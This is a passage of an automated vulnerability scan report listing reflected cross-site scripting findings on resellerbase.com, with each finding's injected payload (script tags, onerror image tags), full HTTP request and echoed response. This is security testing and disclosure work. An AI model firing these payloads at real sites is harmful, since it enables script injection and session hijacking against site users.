GET /bad_link.php6c5f1<script>alert(1)</script>24a5d16097b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/robots.txt
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:08:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /bad_link.php6c5f1<script>alert(1)</script>24a5d16097b was not found on this server.</p>
...[SNIP]...

2.433. http://www.resellerbase.com/bad_link.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6cfc<script>alert(1)</script>d6f55003dc1f41067 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /bad_link.phpb6cfc<script>alert(1)</script>d6f55003dc1f41067?id=&captcha_key=555-555-0199@example.com&pflag=bad_link&r_email=wiener@example.com&submit=Send+Report&type=2&r_name=Peter+Wiener HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/bad_link.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /bad_link.phpb6cfc<script>alert(1)</script>d6f55003dc1f41067?id=&captcha_key=555-555-0199@example.com&pflag=bad_link&r_email=wiener@example.com&submit=Send+Report&type=2&r_name=Peter+Wiener was not found on this server.</p>
...[SNIP]...

2.434. http://www.resellerbase.com/bad_link.php [r_email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The value of the r_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d1a"><img%20src%3da%20onerror%3dalert(1)>945e9dc3eb2d09acd was submitted in the r_email parameter. This input was echoed as c2d1a\"><img src=a onerror=alert(1)>945e9dc3eb2d09acd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /bad_link.php?id=&captcha_key=555-555-0199@example.com&pflag=bad_link&r_email=wiener@example.comc2d1a"><img%20src%3da%20onerror%3dalert(1)>945e9dc3eb2d09acd&submit=Send+Report&type=2&r_name=Peter+Wiener HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/bad_link.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<input class="text3" type="text" name="r_email" size="30" value="wiener@example.comc2d1a\"><img src=a onerror=alert(1)>945e9dc3eb2d09acd" />
...[SNIP]...

2.435. http://www.resellerbase.com/bad_link.php [r_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The value of the r_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91fd4"><img%20src%3da%20onerror%3dalert(1)>cedfdee5b9d463d60 was submitted in the r_name parameter. This input was echoed as 91fd4"><img src=a onerror=alert(1)>cedfdee5b9d463d60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /bad_link.php?id=&captcha_key=555-555-0199@example.com&pflag=bad_link&r_email=wiener@example.com&submit=Send+Report&type=2&r_name=Peter+Wiener91fd4"><img%20src%3da%20onerror%3dalert(1)>cedfdee5b9d463d60 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/bad_link.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<input class="text3" type="text" name="r_name" size="30" value="Peter Wiener91fd4"><img src=a onerror=alert(1)>cedfdee5b9d463d60" />
...[SNIP]...

2.436. http://www.resellerbase.com/bad_link.php/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7bf7<script>alert(1)</script>77759ad7874 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bad_link.phpc7bf7<script>alert(1)</script>77759ad7874/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /bad_link.phpc7bf7<script>alert(1)</script>77759ad7874/ was not found on this server.</p>
...[SNIP]...

2.437. http://www.resellerbase.com/become_editor.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/become_editor.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 218df<script>alert(1)</script>4b175e4229c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /become_editor.php218df<script>alert(1)</script>4b175e4229c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:06:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /become_editor.php218df<script>alert(1)</script>4b175e4229c was not found on this server.</p>
...[SNIP]...

2.438. http://www.resellerbase.com/become_editor.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/become_editor.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ffe"><a>d0bf1d1ae1f was submitted in the cat parameter. This input was echoed as d9ffe\"><a>d0bf1d1ae1f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /become_editor.php?cat=13d9ffe"><a>d0bf1d1ae1f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/become_editor.php?cat=13d9ffe\"><a>d0bf1d1ae1f" />
...[SNIP]...

2.439. http://www.resellerbase.com/become_editor.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/become_editor.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb00c"><a>fe1fbc85db5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb00c\"><a>fe1fbc85db5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /become_editor.php?eb00c"><a>fe1fbc85db5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/become_editor.php?eb00c\"><a>fe1fbc85db5=1" />
...[SNIP]...

2.440. http://www.resellerbase.com/blocks/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/blocks/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 28d32<script>alert(1)</script>4da8eff9e11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blocks28d32<script>alert(1)</script>4da8eff9e11/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /blocks28d32<script>alert(1)</script>4da8eff9e11/ was not found on this server.</p>
...[SNIP]...

2.441. http://www.resellerbase.com/blocks/block.login.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/blocks/block.login.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be6a7<script>alert(1)</script>3974595fe99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blocksbe6a7<script>alert(1)</script>3974595fe99/block.login.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /blocksbe6a7<script>alert(1)</script>3974595fe99/block.login.php was not found on this server.</p>
...[SNIP]...

2.442. http://www.resellerbase.com/blocks/block.whos_online.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/blocks/block.whos_online.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 16ddc<script>alert(1)</script>3353187f5e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blocks16ddc<script>alert(1)</script>3353187f5e5/block.whos_online.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /blocks16ddc<script>alert(1)</script>3353187f5e5/block.whos_online.php was not found on this server.</p>
...[SNIP]...

2.443. http://www.resellerbase.com/browsepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b098<script>alert(1)</script>091f0a5fd40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browsepr.php6b098<script>alert(1)</script>091f0a5fd40?pr=8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /browsepr.php6b098<script>alert(1)</script>091f0a5fd40?pr=8 was not found on this server.</p>
...[SNIP]...

2.444. http://www.resellerbase.com/browsepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c50d<script>alert(1)</script>ce0c6152c85a330f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /browsepr.php7c50d<script>alert(1)</script>ce0c6152c85a330f6?pr=5&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /browsepr.php7c50d<script>alert(1)</script>ce0c6152c85a330f6?pr=5&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.445. http://www.resellerbase.com/browsepr.php [pr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The value of the pr request parameter is copied into the HTML document as text between TITLE tags. The payload 27461</title><img%20src%3da%20onerror%3dalert(1)>bcdbf3d81ab was submitted in the pr parameter. This input was echoed as 27461</title><img src=a onerror=alert(1)>bcdbf3d81ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browsepr.php?pr=827461</title><img%20src%3da%20onerror%3dalert(1)>bcdbf3d81ab HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:25:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 827461</title><img src=a onerror=alert(1)>bcdbf3d81ab</title>
...[SNIP]...

2.446. http://www.resellerbase.com/browsepr.php [pr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The value of the pr request parameter is copied into the HTML document as plain text between tags. The payload 31a6b<img%20src%3da%20onerror%3dalert(1)>6c1c3dd19c2 was submitted in the pr parameter. This input was echoed as 31a6b<img src=a onerror=alert(1)>6c1c3dd19c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browsepr.php?pr=831a6b<img%20src%3da%20onerror%3dalert(1)>6c1c3dd19c2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:25:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 831a6b
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [PR : 831a6b<img src=a onerror=alert(1)>6c1c3dd19c2]</td>
...[SNIP]...

2.447. http://www.resellerbase.com/browsepr.php [pr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The value of the pr request parameter is copied into the HTML document as plain text between tags. The payload d0ec7<img%20src%3da%20onerror%3dalert(1)>ecfd128cc1ef61bbf was submitted in the pr parameter. This input was echoed as d0ec7<img src=a onerror=alert(1)>ecfd128cc1ef61bbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /browsepr.php?pr=5d0ec7<img%20src%3da%20onerror%3dalert(1)>ecfd128cc1ef61bbf&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.448. http://www.resellerbase.com/browsepr.php [pr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The value of the pr request parameter is copied into the HTML document as text between TITLE tags. The payload e62fb</title><img%20src%3da%20onerror%3dalert(1)>421989210ddb81ef7 was submitted in the pr parameter. This input was echoed as e62fb</title><img src=a onerror=alert(1)>421989210ddb81ef7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /browsepr.php?pr=5e62fb</title><img%20src%3da%20onerror%3dalert(1)>421989210ddb81ef7&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:26:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 5e62fb</title><img src=a onerror=alert(1)>421989210ddb81ef7</title>
...[SNIP]...

2.449. http://www.resellerbase.com/cgi-bin/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/cgi-bin/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e014<script>alert(1)</script>8aa3df60110 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin1e014<script>alert(1)</script>8aa3df60110/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /cgi-bin1e014<script>alert(1)</script>8aa3df60110/ was not found on this server.</p>
...[SNIP]...

2.450. http://www.resellerbase.com/communication/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7d36<script>alert(1)</script>e32156eaf07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicatione7d36<script>alert(1)</script>e32156eaf07/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicatione7d36<script>alert(1)</script>e32156eaf07/ was not found on this server.</p>
...[SNIP]...

